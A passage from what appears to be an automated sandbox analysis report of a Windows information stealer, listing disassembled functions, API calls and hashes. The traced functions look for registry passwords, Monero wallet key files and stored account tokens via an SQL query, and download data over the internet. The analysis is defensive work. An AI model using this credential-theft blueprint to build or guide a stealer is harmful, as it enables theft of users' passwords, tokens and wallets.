                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                          • Instruction ID: 8d4a74a3f157d875425abb4447cfe267e8b7958d743c0927800fe4e7f0ed4069
                          • Opcode Fuzzy Hash: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                          • Instruction Fuzzy Hash: AF211AB1E44218ABDF00DFD4DD4AFAEBBB8FB45B14F104609F605BB280D77869058BA5
                          Function 003860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                          • InternetOpenA.WININET(003A0DF7,00000001,00000000,00000000,00000000), ref: 0038610F
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0038618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003861B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 003861DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00386249
                          • InternetCloseHandle.WININET(?), ref: 00386253
                          • InternetCloseHandle.WININET(00000000), ref: 00386260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                          • Instruction ID: 801508d4c17982154f4783e8c7ae85dd935bcfa1ea37aada6fe931c589e4242f
                          • Opcode Fuzzy Hash: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                          • Instruction Fuzzy Hash: B35190B1900718AFDF21EF60CC4ABEE77B8FB44305F0085D8A605AB181DB746A89DF95
                          Function 003872D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                          • HeapFree.KERNEL32(00000000), ref: 00387459
                          • task.LIBCPMTD ref: 00387555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                          • Instruction ID: 0257cf703ac0bb36b62e345ead26a3c03a56f76d9a1a426b4b620f5f404b36b8
                          • Opcode Fuzzy Hash: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                          • Instruction Fuzzy Hash: 16613BB580426C9BDB25EB50CC45FDAB7B9FF44304F1081E9E649AA141DBB09BC9CFA1
                          Function 003940B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00E3D620,00000000,00020119,?), ref: 003940F4
                          • RegQueryValueExA.ADVAPI32(?,00E3E5D8,00000000,00000000,00000000,000000FF), ref: 00394118
                          • RegCloseKey.ADVAPI32(?), ref: 00394122
                          • lstrcat.KERNEL32(?,00000000), ref: 00394147
                          • lstrcat.KERNEL32(?,00E3E620), ref: 0039415B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID: $
                          • API String ID: 690832082-1568808812
                          • Opcode ID: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                          • Instruction ID: d151493793ad9709ab334dca937bede1bb1ded965656a3f3972f70a333d3f370
                          • Opcode Fuzzy Hash: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                          • Instruction Fuzzy Hash: 8B4187B6D0020C6BDF15FBA0EC46FFE777DAB98304F004558B6199A181EA755B8C8BD2
                          Function 0038BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0038BC9F
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0038BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0038BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0038BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                          • Instruction ID: 67c0bd1e56b15e401caf2c0f9e538af44717d56aa04d88ec3af7af763cc8b6ea
                          • Opcode Fuzzy Hash: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                          • Instruction Fuzzy Hash: 83B141729106189BDF06FBA0DD96EEE7778BF54300F404258F506AA091EF346E49DBE2
                          Function 00396770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                          • Instruction ID: 79a8265c5936548aa9c5a27bd38ea24e9cc9f2bf2a862d9709ccbc26b039a99a
                          • Opcode Fuzzy Hash: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                          • Instruction Fuzzy Hash: 9FF05E3590520DEFD7449FE0ED1EB2C7FB4FB1470BF040199E60986290D6704B46AB96
                          Function 00394780 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00E3E470), ref: 003947DB
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394801
                          • lstrcat.KERNEL32(?,?), ref: 00394820
                          • lstrcat.KERNEL32(?,?), ref: 00394834
                          • lstrcat.KERNEL32(?,00E2B5E0), ref: 00394847
                          • lstrcat.KERNEL32(?,?), ref: 0039485B
                          • lstrcat.KERNEL32(?,00E3D6E0), ref: 0039486F
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                            • Part of subcall function 00394570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                            • Part of subcall function 00394570: RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                            • Part of subcall function 00394570: wsprintfA.USER32 ref: 003945A6
                            • Part of subcall function 00394570: FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID: p
                          • API String ID: 2540262943-2678736219
                          • Opcode ID: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                          • Instruction ID: 8ab92cd689779097317d1f8185965364b3abbca654ce664b8130c6dff7d0d0ac
                          • Opcode Fuzzy Hash: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                          • Instruction Fuzzy Hash: F13184B290021C5BCF12F7B0DC85EE9777CAB58704F404589B315EA081EE749B8ECB95
                          Function 00384FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00384FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00384FD1
                          • InternetOpenA.WININET(003A0DDF,00000000,00000000,00000000,00000000), ref: 00384FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00385011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00385041
                          • InternetCloseHandle.WININET(?), ref: 003850B9
                          • InternetCloseHandle.WININET(?), ref: 003850C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 2c917e028d8865ad514425ac79393382a208bc0e1a6531e226e9d6235ca2e03e
                          • Instruction ID: ea220e00e2ccf6ac37472721f7dbcfe6e826e6c93e8f7c3b46c76359424170b0
                          • Opcode Fuzzy Hash: 2c917e028d8865ad514425ac79393382a208bc0e1a6531e226e9d6235ca2e03e
                          • Instruction Fuzzy Hash: A431F5F4A4021CABDB20DF54DC85BDCBBB4FB48708F1081D9EA09A7281C7706AC59F99
                          Function 003983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                          • wsprintfA.USER32 ref: 00398459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E350,00000000,000F003F,?,00000400), ref: 003984EC
                          • lstrlen.KERNEL32(?), ref: 00398501
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E440,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003A0B34), ref: 00398599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                          • Instruction ID: 3e6b7ed1cc97d9c1da75357b18dfc09011897963d97e64a7b6ce016433c36981
                          • Opcode Fuzzy Hash: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                          • Instruction Fuzzy Hash: BB21E77191022CAFDB24DB54DC85FE9B7B8FB48704F00C598E649A6140DF71AA85CFE4
                          Function 00397690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003976A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003976AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BE88,00000000,00020119,00000000), ref: 003976DD
                          • RegQueryValueExA.ADVAPI32(00000000,00E3E2D8,00000000,00000000,?,000000FF), ref: 003976FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00397708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
